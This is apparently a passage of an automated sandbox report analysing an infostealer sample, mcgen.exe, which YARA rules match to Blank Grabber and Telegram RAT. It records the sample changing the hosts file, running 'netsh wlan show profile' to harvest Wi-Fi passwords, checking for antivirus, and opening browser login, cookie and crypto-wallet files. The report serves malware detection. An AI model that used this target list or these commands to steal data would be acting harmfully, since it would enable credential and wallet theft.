Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 0_2_00007FF6B9F1D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6B9F1D080

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 0_2_00007FF6B9F35C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6B9F35C70

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695D148CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

103_2_00007FF695D148CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Desktop\mcgen.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcgen.exe PID: 3212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F088000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F078000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.2124495523.0000024512162000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2519812485.000002C54FAC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2124495523.0000024512164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2531278719.000002C54FC26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mcgen.exe PID: 3212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mcgen.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI32122\rarreg.key, type: DROPPED

